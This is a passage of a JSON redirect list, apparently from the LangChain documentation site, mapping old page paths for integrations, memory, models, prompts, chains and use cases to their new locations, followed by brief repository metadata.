"/docs/modules/data_connection/vectorstores/integrations/qdrant", "destination": "/docs/integrations/vectorstores/qdrant" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/redis.html", "destination": "/docs/integrations/vectorstores/redis" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/redis", "destination": "/docs/integrations/vectorstores/redis" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/singlestoredb.html", "destination": "/docs/integrations/vectorstores/singlestoredb" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/singlestoredb", "destination": "/docs/integrations/vectorstores/singlestoredb" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/sklearn.html", "destination": "/docs/integrations/vectorstores/sklearn" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/sklearn", "destination": "/docs/integrations/vectorstores/sklearn" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/supabase.html", "destination": "/docs/integrations/vectorstores/supabase" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/supabase", "destination": "/docs/integrations/vectorstores/supabase" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/tair.html", "destination": "/docs/integrations/vectorstores/tair" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/tair", "destination": "/docs/integrations/vectorstores/tair" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/tigris.html", "destination": "/docs/integrations/vectorstores/tigris" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/tigris", "destination": "/docs/integrations/vectorstores/tigris" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/typesense.html", "destination": 
"/docs/integrations/vectorstores/typesense" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/typesense", "destination": "/docs/integrations/vectorstores/typesense" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/vectara.html", "destination": "/docs/integrations/vectorstores/vectara" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/vectara", "destination": "/docs/integrations/vectorstores/vectara" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/weaviate.html", "destination": "/docs/integrations/vectorstores/weaviate" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/weaviate", "destination": "/docs/integrations/vectorstores/weaviate" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/zilliz.html", "destination": "/docs/integrations/vectorstores/zilliz" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/zilliz", "destination": "/docs/integrations/vectorstores/zilliz" }, { "source": "/en/latest/modules/memory/examples/adding_memory.html", "destination": "/docs/modules/memory/how_to/adding_memory" }, { "source": "/en/latest/modules/memory/examples/adding_memory_chain_multiple_inputs.html", "destination": "/docs/modules/memory/how_to/adding_memory_chain_multiple_inputs" }, { "source": "/en/latest/modules/memory/examples/agent_with_memory.html", "destination": "/docs/modules/memory/how_to/agent_with_memory" }, { "source": "/en/latest/modules/memory/examples/agent_with_memory_in_db.html", "destination": "/docs/modules/memory/how_to/agent_with_memory_in_db" }, { "source": "/en/latest/modules/memory/examples/conversational_customization.html", "destination": "/docs/modules/memory/how_to/conversational_customization" }, { "source": "/en/latest/modules/memory/examples/custom_memory.html", "destination": "/docs/modules/memory/how_to/custom_memory" }, { "source": "/en/latest/modules/memory/types/kg.html", "destination": "/docs/modules/memory/how_to/kg" }, { "source": "/en/latest/modules/memory/examples/multiple_memory.html", "destination": "/docs/modules/memory/how_to/multiple_memory" }, { "source": "/en/latest/modules/memory/types/summary_buffer.html", "destination": "/docs/modules/memory/how_to/summary_buffer" }, { "source": "/en/latest/modules/memory/types/token_buffer.html", "destination": "/docs/modules/memory/how_to/token_buffer" }, { "source": "/en/latest/modules/memory/examples/cassandra_chat_message_history.html", "destination": "/docs/integrations/memory/cassandra_chat_message_history" }, { "source": "/docs/modules/memory/integrations/cassandra_chat_message_history", "destination": "/docs/integrations/memory/cassandra_chat_message_history" }, { "source": "/en/latest/modules/memory/examples/dynamodb_chat_message_history.html", "destination": "/docs/integrations/memory/dynamodb_chat_message_history" }, { "source": "/docs/modules/memory/integrations/dynamodb_chat_message_history", "destination": "/docs/integrations/memory/dynamodb_chat_message_history" }, { "source": "/en/latest/modules/memory/examples/entity_memory_with_sqlite.html", "destination": "/docs/integrations/memory/entity_memory_with_sqlite" }, { "source": "/docs/modules/memory/integrations/entity_memory_with_sqlite", "destination": "/docs/integrations/memory/entity_memory_with_sqlite" }, { "source": "/en/latest/modules/memory/examples/momento_chat_message_history.html", "destination": "/docs/integrations/memory/momento_chat_message_history" }, { "source": 
"/docs/modules/memory/integrations/momento_chat_message_history", "destination": "/docs/integrations/memory/momento_chat_message_history" }, { "source": "/en/latest/modules/memory/examples/mongodb_chat_message_history.html", "destination": "/docs/integrations/memory/mongodb_chat_message_history" }, { "source": "/docs/modules/memory/integrations/mongodb_chat_message_history", "destination": "/docs/integrations/memory/mongodb_chat_message_history" }, { "source": "/en/latest/modules/memory/examples/motorhead_memory.html", "destination": "/docs/integrations/memory/motorhead_memory" }, { "source": "/docs/modules/memory/integrations/motorhead_memory", "destination": "/docs/integrations/memory/motorhead_memory" }, { "source": "/en/latest/modules/memory/examples/motorhead_memory_managed.html", "destination": "/docs/integrations/memory/motorhead_memory_managed" }, { "source": "/docs/modules/memory/integrations/motorhead_memory_managed", "destination": "/docs/integrations/memory/motorhead_memory_managed" }, { "source": "/en/latest/modules/memory/examples/postgres_chat_message_history.html", "destination": "/docs/integrations/memory/postgres_chat_message_history" }, { "source": "/docs/modules/memory/integrations/postgres_chat_message_history", "destination": "/docs/integrations/memory/postgres_chat_message_history" }, { "source": "/en/latest/modules/memory/examples/redis_chat_message_history.html", "destination": "/docs/integrations/memory/redis_chat_message_history" }, { "source": "/docs/modules/memory/integrations/redis_chat_message_history", "destination": "/docs/integrations/memory/redis_chat_message_history" }, { "source": "/en/latest/modules/memory/examples/zep_memory.html", "destination": "/docs/integrations/memory/zep_memory" }, { "source": "/docs/modules/memory/integrations/zep_memory", "destination": "/docs/integrations/memory/zep_memory" }, { "source": "/en/latest/modules/models/chat/integrations/anthropic.html", "destination": "/docs/integrations/chat/anthropic" }, { "source": "/docs/modules/model_io/models/chat/integrations/anthropic", "destination": "/docs/integrations/chat/anthropic" }, { "source": "/en/latest/modules/models/chat/integrations/azure_chat_openai.html", "destination": "/docs/integrations/chat/azure_chat_openai" }, { "source": "/docs/modules/model_io/models/chat/integrations/azure_chat_openai", "destination": "/docs/integrations/chat/azure_chat_openai" }, { "source": "/en/latest/modules/models/chat/integrations/google_vertex_ai_palm.html", "destination": "/docs/integrations/chat/google_vertex_ai_palm" }, { "source": "/docs/modules/model_io/models/chat/integrations/google_vertex_ai_palm", "destination": "/docs/integrations/chat/google_vertex_ai_palm" }, { "source": "/en/latest/modules/models/chat/integrations/openai.html", "destination": "/docs/integrations/chat/openai" }, { "source": "/docs/modules/model_io/models/chat/integrations/openai", "destination": "/docs/integrations/chat/openai" }, { "source": "/en/latest/modules/models/chat/integrations/promptlayer_chatopenai.html", "destination": "/docs/integrations/chat/promptlayer_chatopenai" }, { "source": "/docs/modules/model_io/models/chat/integrations/promptlayer_chatopenai", "destination": "/docs/integrations/chat/promptlayer_chatopenai" }, { "source": "/en/latest/modules/models/llms/examples/async_llm.html", "destination": "/docs/modules/model_io/models/llms/how_to/async_llm" }, { "source": "/en/latest/modules/models/llms/examples/custom_llm.html", "destination": "/docs/modules/model_io/models/llms/how_to/custom_llm" }, 
{ "source": "/en/latest/modules/models/llms/examples/fake_llm.html", "destination": "/docs/modules/model_io/models/llms/how_to/fake_llm" }, { "source": "/en/latest/modules/models/llms/examples/human_input_llm.html", "destination": "/docs/modules/model_io/models/llms/how_to/human_input_llm" }, { "source": "/en/latest/modules/models/llms/examples/llm_serialization.html", "destination": "/docs/modules/model_io/models/llms/how_to/llm_serialization" }, { "source": "/en/latest/modules/models/llms/examples/token_usage_tracking.html", "destination": "/docs/modules/model_io/models/llms/how_to/token_usage_tracking" }, { "source": "/en/latest/modules/models/llms/integrations/ai21.html", "destination": "/docs/integrations/llms/ai21" }, { "source": "/docs/modules/model_io/models/llms/integrations/ai21", "destination": "/docs/integrations/llms/ai21" }, { "source": "/en/latest/modules/models/llms/integrations/aleph_alpha.html", "destination": "/docs/integrations/llms/aleph_alpha" }, { "source": "/docs/modules/model_io/models/llms/integrations/aleph_alpha", "destination": "/docs/integrations/llms/aleph_alpha" }, { "source": "/en/latest/modules/models/llms/integrations/anyscale.html", "destination": "/docs/integrations/llms/anyscale" }, { "source": "/docs/modules/model_io/models/llms/integrations/anyscale", "destination": "/docs/integrations/llms/anyscale" }, { "source": "/en/latest/modules/models/llms/integrations/azure_openai_example.html", "destination": "/docs/integrations/llms/azure_openai_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/azure_openai_example", "destination": "/docs/integrations/llms/azure_openai_example" }, { "source": "/en/latest/modules/models/llms/integrations/banana.html", "destination": "/docs/integrations/llms/banana" }, { "source": "/docs/modules/model_io/models/llms/integrations/banana", "destination": "/docs/integrations/llms/banana" }, { "source": "/en/latest/modules/models/llms/integrations/baseten.html", "destination": "/docs/integrations/llms/baseten" }, { "source": "/docs/modules/model_io/models/llms/integrations/baseten", "destination": "/docs/integrations/llms/baseten" }, { "source": "/en/latest/modules/models/llms/integrations/beam.html", "destination": "/docs/integrations/llms/beam" }, { "source": "/docs/modules/model_io/models/llms/integrations/beam", "destination": "/docs/integrations/llms/beam" }, { "source": "/en/latest/modules/models/llms/integrations/bedrock.html", "destination": "/docs/integrations/llms/bedrock" }, { "source": "/docs/modules/model_io/models/llms/integrations/bedrock", "destination": "/docs/integrations/llms/bedrock" }, { "source": "/en/latest/modules/models/llms/integrations/cerebriumai_example.html", "destination": "/docs/integrations/llms/cerebriumai_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/cerebriumai_example", "destination": "/docs/integrations/llms/cerebriumai_example" }, { "source": "/en/latest/modules/models/llms/integrations/cohere.html", "destination": "/docs/integrations/llms/cohere" }, { "source": "/docs/modules/model_io/models/llms/integrations/cohere", "destination": "/docs/integrations/llms/cohere" }, { "source": "/en/latest/modules/models/llms/integrations/ctransformers.html", "destination": "/docs/integrations/llms/ctransformers" }, { "source": "/docs/modules/model_io/models/llms/integrations/ctransformers", "destination": "/docs/integrations/llms/ctransformers" }, { "source": "/en/latest/modules/models/llms/integrations/databricks.html", "destination": 
"/docs/integrations/llms/databricks" }, { "source": "/docs/modules/model_io/models/llms/integrations/databricks", "destination": "/docs/integrations/llms/databricks" }, { "source": "/en/latest/modules/models/llms/integrations/deepinfra_example.html", "destination": "/docs/integrations/llms/deepinfra_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/deepinfra_example", "destination": "/docs/integrations/llms/deepinfra_example" }, { "source": "/en/latest/modules/models/llms/integrations/forefrontai_example.html", "destination": "/docs/integrations/llms/forefrontai_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/forefrontai_example", "destination": "/docs/integrations/llms/forefrontai_example" }, { "source": "/en/latest/modules/models/llms/integrations/google_vertex_ai_palm.html", "destination": "/docs/integrations/llms/google_vertex_ai_palm" }, { "source": "/docs/modules/model_io/models/llms/integrations/google_vertex_ai_palm", "destination": "/docs/integrations/llms/google_vertex_ai_palm" }, { "source": "/en/latest/modules/models/llms/integrations/gooseai_example.html", "destination": "/docs/integrations/llms/gooseai_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/gooseai_example", "destination": "/docs/integrations/llms/gooseai_example" }, { "source": "/en/latest/modules/models/llms/integrations/huggingface_hub.html", "destination": "/docs/integrations/llms/huggingface_hub" }, { "source": "/docs/modules/model_io/models/llms/integrations/huggingface_hub", "destination": "/docs/integrations/llms/huggingface_hub" }, { "source": "/en/latest/modules/models/llms/integrations/huggingface_pipelines.html", "destination": "/docs/integrations/llms/huggingface_pipelines" }, { "source": "/docs/modules/model_io/models/llms/integrations/huggingface_pipelines", "destination": "/docs/integrations/llms/huggingface_pipelines" }, { "source": "/en/latest/modules/models/llms/integrations/huggingface_textgen_inference.html", "destination": "/docs/integrations/llms/huggingface_textgen_inference" }, { "source": "/docs/modules/model_io/models/llms/integrations/huggingface_textgen_inference", "destination": "/docs/integrations/llms/huggingface_textgen_inference" }, { "source": "/en/latest/modules/models/llms/integrations/jsonformer_experimental.html", "destination": "/docs/integrations/llms/jsonformer_experimental" }, { "source": "/docs/modules/model_io/models/llms/integrations/jsonformer_experimental", "destination": "/docs/integrations/llms/jsonformer_experimental" }, { "source": "/en/latest/modules/models/llms/integrations/llamacpp.html", "destination": "/docs/integrations/llms/llamacpp" }, { "source": "/docs/modules/model_io/models/llms/integrations/llamacpp", "destination": "/docs/integrations/llms/llamacpp" }, { "source": "/en/latest/modules/models/llms/examples/llm_caching.html", "destination": "/docs/integrations/llms/llm_caching" }, { "source": "/docs/modules/model_io/models/llms/integrations/llm_caching", "destination": "/docs/integrations/llms/llm_caching" }, { "source": "/en/latest/modules/models/llms/integrations/manifest.html", "destination": "/docs/integrations/llms/manifest" }, { "source": "/docs/modules/model_io/models/llms/integrations/manifest", "destination": "/docs/integrations/llms/manifest" }, { "source": "/en/latest/modules/models/llms/integrations/modal.html", "destination": "/docs/integrations/llms/modal" }, { "source": "/docs/modules/model_io/models/llms/integrations/modal", "destination": 
"/docs/integrations/llms/modal" }, { "source": "/en/latest/modules/models/llms/integrations/mosaicml.html", "destination": "/docs/integrations/llms/mosaicml" }, { "source": "/docs/modules/model_io/models/llms/integrations/mosaicml", "destination": "/docs/integrations/llms/mosaicml" }, { "source": "/en/latest/modules/models/llms/integrations/nlpcloud.html", "destination": "/docs/integrations/llms/nlpcloud" }, { "source": "/docs/modules/model_io/models/llms/integrations/nlpcloud", "destination": "/docs/integrations/llms/nlpcloud" }, { "source": "/en/latest/modules/models/llms/integrations/openai.html", "destination": "/docs/integrations/llms/openai" }, { "source": "/docs/modules/model_io/models/llms/integrations/openai", "destination": "/docs/integrations/llms/openai" }, { "source": "/en/latest/modules/models/llms/integrations/openlm.html", "destination": "/docs/integrations/llms/openlm" }, { "source": "/docs/modules/model_io/models/llms/integrations/openlm", "destination": "/docs/integrations/llms/openlm" }, { "source": "/en/latest/modules/models/llms/integrations/petals_example.html", "destination": "/docs/integrations/llms/petals_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/petals_example", "destination": "/docs/integrations/llms/petals_example" }, { "source": "/en/latest/modules/models/llms/integrations/pipelineai_example.html", "destination": "/docs/integrations/llms/pipelineai_example" }, { "source": "/docs/modules/model_io/models/llms/integrations/pipelineai_example", "destination": "/docs/integrations/llms/pipelineai_example" }, { "source": "/en/latest/modules/models/llms/integrations/predictionguard.html", "destination": "/docs/integrations/llms/predictionguard" }, { "source": "/docs/modules/model_io/models/llms/integrations/predictionguard", "destination": "/docs/integrations/llms/predictionguard" }, { "source": "/en/latest/modules/models/llms/integrations/promptlayer_openai.html", "destination": "/docs/integrations/llms/promptlayer_openai" }, { "source": "/docs/modules/model_io/models/llms/integrations/promptlayer_openai", "destination": "/docs/integrations/llms/promptlayer_openai" }, { "source": "/en/latest/modules/models/llms/integrations/rellm_experimental.html", "destination": "/docs/integrations/llms/rellm_experimental" }, { "source": "/docs/modules/model_io/models/llms/integrations/rellm_experimental", "destination": "/docs/integrations/llms/rellm_experimental" }, { "source": "/en/latest/modules/models/llms/integrations/replicate.html", "destination": "/docs/integrations/llms/replicate" }, { "source": "/docs/modules/model_io/models/llms/integrations/replicate", "destination": "/docs/integrations/llms/replicate" }, { "source": "/en/latest/modules/models/llms/integrations/runhouse.html", "destination": "/docs/integrations/llms/runhouse" }, { "source": "/docs/modules/model_io/models/llms/integrations/runhouse", "destination": "/docs/integrations/llms/runhouse" }, { "source": "/en/latest/modules/models/llms/integrations/sagemaker.html", "destination": "/docs/integrations/llms/sagemaker" }, { "source": "/docs/modules/model_io/models/llms/integrations/sagemaker", "destination": "/docs/integrations/llms/sagemaker" }, { "source": "/en/latest/modules/models/llms/integrations/stochasticai.html", "destination": "/docs/integrations/llms/stochasticai" }, { "source": "/docs/modules/model_io/models/llms/integrations/stochasticai", "destination": "/docs/integrations/llms/stochasticai" }, { "source": "/en/latest/modules/models/llms/integrations/writer.html", 
"destination": "/docs/integrations/llms/writer" }, { "source": "/docs/modules/model_io/models/llms/integrations/writer", "destination": "/docs/integrations/llms/writer" }, { "source": "/en/latest/modules/prompts.html", "destination": "/docs/modules/model_io/prompts" }, { "source": "/en/latest/modules/prompts/output_parsers.html", "destination": "/docs/modules/model_io/output_parsers/" }, { "source": "/docs/modules/prompts/output_parsers.html", "destination": "/docs/modules/model_io/output_parsers/" }, { "source": "/en/latest/modules/prompts/output_parsers/examples/datetime.html", "destination": "/docs/modules/model_io/output_parsers/datetime" }, { "source": "/en/latest/modules/prompts/output_parsers/examples/enum.html", "destination": "/docs/modules/model_io/output_parsers/enum" }, { "source": "/en/latest/modules/prompts/output_parsers/examples/pydantic.html", "destination": "/docs/modules/model_io/output_parsers/pydantic" }, { "source": "/en/latest/modules/prompts/output_parsers/examples/retry.html", "destination": "/docs/modules/model_io/output_parsers/retry" }, { "source": "/en/latest/modules/prompts/example_selectors/examples/custom_example_selector.html", "destination": "/docs/modules/model_io/prompts/example_selectors/custom_example_selector" }, { "source": "/en/latest/modules/prompts/example_selectors/examples/mmr.html", "destination": "/docs/modules/model_io/prompts/example_selectors/mmr" }, { "source": "/en/latest/modules/prompts/example_selectors/examples/ngram_overlap.html", "destination": "/docs/modules/model_io/prompts/example_selectors/ngram_overlap" }, { "source": "/en/latest/modules/prompts/prompt_templates/examples/connecting_to_a_feature_store.html", "destination": "/docs/modules/model_io/prompts/prompt_templates/connecting_to_a_feature_store" }, { "source": "/en/latest/modules/prompts/prompt_templates/examples/custom_prompt_template.html", "destination": "/docs/modules/model_io/prompts/prompt_templates/custom_prompt_template" }, { "source": "/en/latest/modules/models/chat/examples/few_shot_examples.html", "destination": "/docs/modules/model_io/prompts/prompt_templates/few_shot_examples_chat" }, { "source": "/en/latest/modules/prompts/prompt_templates/examples/prompt_serialization.html", "destination": "/docs/modules/model_io/prompts/prompt_templates/prompt_serialization" }, { "source": "/en/latest/use_cases/agent_simulations/camel_role_playing.html", "destination": "/docs/use_cases/agent_simulations/camel_role_playing" }, { "source": "/en/latest/use_cases/agent_simulations/characters.html", "destination": "/docs/use_cases/agent_simulations/characters" }, { "source": "/en/latest/use_cases/agent_simulations/gymnasium.html", "destination": "/docs/use_cases/agent_simulations/gymnasium" }, { "source": "/en/latest/use_cases/agent_simulations/multi_player_dnd.html", "destination": "/docs/use_cases/agent_simulations/multi_player_dnd" }, { "source": "/en/latest/use_cases/agent_simulations/multiagent_authoritarian.html", "destination": "/docs/use_cases/agent_simulations/multiagent_authoritarian" }, { "source": "/en/latest/use_cases/agent_simulations/multiagent_bidding.html", "destination": "/docs/use_cases/agent_simulations/multiagent_bidding" }, { "source": "/en/latest/use_cases/agent_simulations/petting_zoo.html", "destination": "/docs/use_cases/agent_simulations/petting_zoo" }, { "source": "/en/latest/use_cases/agent_simulations/two_agent_debate_tools.html", "destination": "/docs/use_cases/agent_simulations/two_agent_debate_tools" }, { "source": 
"/en/latest/use_cases/agent_simulations/two_player_dnd.html", "destination": "/docs/use_cases/agent_simulations/two_player_dnd" }, { "source": "/en/latest/use_cases/agents/baby_agi.html", "destination": "/docs/use_cases/agents/baby_agi" }, { "source": "/en/latest/use_cases/agents/baby_agi_with_agent.html", "destination": "/docs/use_cases/agents/baby_agi_with_agent" }, { "source": "/en/latest/use_cases/agents/camel_role_playing.html", "destination": "/docs/use_cases/agents/camel_role_playing" }, { "source": "/en/latest/use_cases/agents/custom_agent_with_plugin_retrieval.html", "destination": "/docs/use_cases/agents/custom_agent_with_plugin_retrieval" }, { "source": "/en/latest/use_cases/agents/custom_agent_with_plugin_retrieval_using_plugnplai.html", "destination": "/docs/use_cases/agents/custom_agent_with_plugin_retrieval_using_plugnplai" }, { "source": "/en/latest/use_cases/agents/multi_modal_output_agent.html", "destination": "/docs/use_cases/agents/multi_modal_output_agent" }, { "source": "/en/latest/use_cases/agents/sales_agent_with_context.html", "destination": "/docs/use_cases/agents/sales_agent_with_context" }, { "source": "/en/latest/use_cases/agents/wikibase_agent.html", "destination": "/docs/use_cases/agents/wikibase_agent" }, { "source": "/en/latest/use_cases/apis.html", "destination": "/docs/use_cases/apis" }, { "source": "/en/latest/use_cases/autonomous_agents/autogpt.html", "destination": "/docs/use_cases/autonomous_agents/autogpt" }, { "source": "/en/latest/use_cases/autonomous_agents/baby_agi.html", "destination": "/docs/use_cases/autonomous_agents/baby_agi" }, { "source": "/en/latest/use_cases/autonomous_agents/baby_agi_with_agent.html", "destination": "/docs/use_cases/autonomous_agents/baby_agi_with_agent" }, { "source": "/en/latest/use_cases/autonomous_agents/marathon_times.html", "destination": "/docs/use_cases/autonomous_agents/marathon_times" }, { "source": "/en/latest/use_cases/autonomous_agents/meta_prompt.html", "destination": "/docs/use_cases/autonomous_agents/meta_prompt" }, { "source": "/en/latest/use_cases/chatbots/voice_assistant.html", "destination": "/docs/use_cases/chatbots/voice_assistant" }, { "source": "/en/latest/use_cases/code/code-analysis-deeplake.html", "destination": "/docs/use_cases/code/code-analysis-deeplake" }, { "source": "/en/latest/use_cases/code/twitter-the-algorithm-analysis-deeplake.html", "destination": "/docs/use_cases/code/twitter-the-algorithm-analysis-deeplake" }, { "source": "/en/latest/use_cases/extraction.html", "destination": "/docs/use_cases/extraction" }, { "source": "/en/latest/use_cases/multi_modal/image_agent.html", "destination": "/docs/use_cases/multi_modal/image_agent" }, { "source": "/en/latest/use_cases/question_answering/semantic-search-over-chat.html", "destination": "/docs/use_cases/question_answering/semantic-search-over-chat" }, { "source": "/en/latest/use_cases/summarization.html", "destination": "/docs/use_cases/summarization" }, { "source": "/en/latest/use_cases/tabular.html", "destination": "/docs/use_cases/tabular" }, { "source": "/en/latest/youtube.html", "destination": "/docs/additional_resources/youtube" }, { "source": "/en/latest/modules/agents/agents/wikibase_agent.html", "destination": "/docs/use_cases/agents/wikibase_agent" }, { "source": "/en/latest/modules/indexes/retrievers/examples/twitter-the-algorithm-analysis-deeplake.html", "destination": "/docs/use_cases/code/twitter-the-algorithm-analysis-deeplake" }, { "source": "/en/latest/explanation/tools.html", "destination": "/docs/modules/agents/tools" 
}, { "source": "/docs", "destination": "/" }, { "source": "/docs/", "destination": "/" }, { "source": "/en/latest", "destination": "/" }, { "source": "/en/latest/", "destination": "/" }, { "source": "/en/latest/index.html", "destination": "/" }, { "source": "/en/latest/modules/indexes/retrievers/examples/self_query_retriever.html", "destination": "/docs/modules/data_connection/retrievers/how_to/self_query/" }, { "source": "/en/latest/modules/indexes/retrievers/examples/:path*", "destination": "/docs/integrations/retrievers/:path*" }, { "source": "/docs/modules/data_connection/retrievers/integrations/:path*", "destination": "/docs/integrations/retrievers/:path*" }, { "source": "/en/latest/modules/indexes/vectorstores/examples/:path*", "destination": "/docs/integrations/vectorstores/:path*" }, { "source": "/docs/modules/data_connection/vectorstores/integrations/:path*", "destination": "/docs/integrations/vectorstores/:path*" }, { "source": "/docs/modules/agents/tools/how_to/:path*", "destination": "/docs/modules/agents/tools/:path*" }, { "source": "/docs/modules/callbacks/how_to/:path*", "destination": "/docs/modules/callbacks/:path*" }, { "source": "/docs/modules/data_connection/document_loaders/how_to/:path*", "destination": "/docs/modules/data_connection/document_loaders/:path*" }, { "source": "/docs/modules/data_connection/retrievers/how_to/:path*", "destination": "/docs/modules/data_connection/retrievers/:path*" }, { "source": "/docs/modules/memory/how_to/:path*", "destination": "/docs/modules/memory/:path*" }, { "source": "/docs/modules/model_io/models/chat/how_to/:path*", "destination": "/docs/modules/model_io/models/chat/:path*" }, { "source": "/docs/modules/model_io/models/llms/how_to/:path*", "destination": "/docs/modules/model_io/models/llms/:path*" }, { "source": "/docs/modules/callbacks/integrations/:path*", "destination": "/docs/integrations/callbacks/:path*" }, { "source": "/docs/modules/data_connection/document_loaders/integrations/:path*", "destination": "/docs/integrations/document_loaders/:path*" }, { "source": "/docs/modules/data_connection/text_embedding/integrations/:path*", "destination": "/docs/integrations/text_embedding/:path*" }, { "source": "/docs/modules/model_io/models/llms/integrations/:path*", "destination": "/docs/integrations/llms/:path*" }, { "source": "/docs/modules/model_io/models/chat/integrations/:path*", "destination": "/docs/integrations/chat/:path*" }, { "source": "/docs/modules/evaluation(/?)", "destination": "/docs/guides/evaluation" }, { "source": "/docs/modules/evaluation/:path*(/?)", "destination": "/docs/guides/evaluation/:path*" }, { "source": "/en/latest/modules/indexes/:path*", "destination": "/docs/modules/data_connection/:path*" }, { "source": "/en/latest/modules/memory/types/:path*", "destination": "/docs/modules/memory/how_to/:path*" }, { "source": "/en/latest/modules/models.html", "destination": "/docs/modules/model_io/models/" }, { "source": "/en/latest/modules/models/:path*", "destination": "/docs/modules/model_io/models/:path*" }, { "source": "/en/latest/modules/prompts/prompt_templates/examples/:path*", "destination": "/docs/modules/model_io/prompts/prompt_templates/:path*" }, { "source": "/en/latest/modules/prompts/:path1*/examples/:path*", "destination": "/docs/modules/model_io/prompts/:path1*/:path*" }, { "source": "/en/latest/reference.html", "destination": "https://api.python.langchain.com" }, { "source": "/en/latest/reference/:path*", "destination": "https://api.python.langchain.com/en/latest/:path*" }, { "source": 
"/en/latest/:path*", "destination": "/docs/:path*" }, { "source": "/docs/modules/chains/additional/constitutional_chain", "destination": "/docs/guides/safety/constitutional_chain" }, { "source": "/docs/modules/chains/additional/moderation", "destination": "/docs/guides/safety/moderation" }, { "source": "/docs/modules/chains/popular/api", "destination": "/docs/use_cases/apis/api" }, { "source": "/docs/modules/chains/additional/analyze_document", "destination": "/docs/use_cases/question_answering/how_to/analyze_document" }, { "source": "/docs/modules/chains/popular/chat_vector_db", "destination": "/docs/use_cases/question_answering/how_to/chat_vector_db" }, { "source": "/docs/modules/chains/additional/multi_retrieval_qa_router", "destination": "/docs/use_cases/question_answering/how_to/multi_retrieval_qa_router" }, { "source": "/docs/modules/chains/additional/question_answering", "destination": "/docs/use_cases/question_answering/how_to/question_answering" }, { "source": "/docs/modules/chains/popular/vector_db_qa", "destination": "/docs/use_cases/question_answering/how_to/vector_db_qa" }, { "source": "/docs/modules/chains/popular/summarize", "destination": "/docs/use_cases/summarization/summarize" }, { "source": "/docs/modules/chains/popular/sqlite", "destination": "/docs/use_cases/tabular/sqlite" }, { "source": "/docs/modules/chains/popular/openai_functions", "destination": "/docs/modules/chains/how_to/openai_functions" }, { "source": "/docs/modules/chains/additional/llm_requests", "destination": "/docs/use_cases/apis/llm_requests" }, { "source": "/docs/modules/chains/additional/openai_openapi", "destination": "/docs/use_cases/apis/openai_openapi" }, { "source": "/docs/modules/chains/additional/openapi", "destination": "/docs/use_cases/apis/openapi" }, { "source": "/docs/modules/chains/additional/openapi_openai", "destination": "/docs/use_cases/apis/openapi_openai" }, { "source": "/docs/modules/chains/additional/cpal", "destination": "/docs/use_cases/code_writing/cpal" }, { "source": "/docs/modules/chains/additional/llm_bash", "destination": "/docs/use_cases/code_writing/llm_bash" }, { "source": "/docs/modules/chains/additional/llm_math", "destination": "/docs/use_cases/code_writing/llm_math" }, { "source": "/docs/modules/chains/additional/llm_symbolic_math", "destination": "/docs/use_cases/code_writing/llm_symbolic_math" }, { "source": "/docs/modules/chains/additional/pal", "destination": "/docs/use_cases/code_writing/pal" }, { "source": "/docs/modules/chains/additional/graph_arangodb_qa", "destination": "/docs/use_cases/graph/graph_arangodb_qa" }, { "source": "/docs/modules/chains/additional/graph_cypher_qa", "destination": "/docs/use_cases/graph/graph_cypher_qa" }, { "source": "/docs/modules/chains/additional/graph_hugegraph_qa", "destination": "/docs/use_cases/graph/graph_hugegraph_qa" }, { "source": "/docs/modules/chains/additional/graph_kuzu_qa", "destination": "/docs/use_cases/graph/graph_kuzu_qa" }, { "source": "/docs/modules/chains/additional/graph_nebula_qa", "destination": "/docs/use_cases/graph/graph_nebula_qa" }, { "source": "/docs/modules/chains/additional/graph_qa", "destination": "/docs/use_cases/graph/graph_qa" }, { "source": "/docs/modules/chains/additional/graph_sparql_qa", "destination": "/docs/use_cases/graph/graph_sparql_qa" }, { "source": "/docs/modules/chains/additional/neptune_cypher_qa", "destination": "/docs/use_cases/graph/neptune_cypher_qa" }, { "source": "/docs/modules/chains/additional/tot", "destination": "/docs/use_cases/graph/tot" }, { "source": 
"/docs/use_cases/question_answering//document-context-aware-QA", "destination": "/docs/use_cases/question_answering/how_to/document-context-aware-QA" }, { "source": "/docs/modules/chains/additional/flare", "destination": "/docs/use_cases/question_answering/how_to/flare" }, { "source": "/docs/modules/chains/additional/hyde", "destination": "/docs/use_cases/question_answering/how_to/hyde" }, { "source": "/docs/use_cases/question_answering//local_retrieval_qa", "destination": "/docs/use_cases/question_answering/how_to/local_retrieval_qa" }, { "source": "/docs/modules/chains/additional/qa_citations", "destination": "/docs/use_cases/question_answering/how_to/qa_citations" }, { "source": "/docs/modules/chains/additional/vector_db_text_generation", "destination": "/docs/use_cases/question_answering/how_to/vector_db_text_generation" }, { "source": "/docs/modules/chains/additional/openai_functions_retrieval_qa", "destination": "/docs/use_cases/question_answering/integrations/openai_functions_retrieval_qa" }, { "source": "/docs/use_cases/question_answering//semantic-search-over-chat", "destination": "/docs/use_cases/question_answering/integrations/semantic-search-over-chat" }, { "source": "/docs/modules/chains/additional/llm_checker", "destination": "/docs/use_cases/self_check/llm_checker" }, { "source": "/docs/modules/chains/additional/llm_summarization_checker", "destination": "/docs/use_cases/self_check/llm_summarization_checker" }, { "source": "/docs/modules/chains/additional/elasticsearch_database", "destination": "/docs/use_cases/tabular/elasticsearch_database" }, { "source": "/docs/modules/chains/additional/tagging", "destination": "/docs/use_cases/tagging" } ] }
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,472
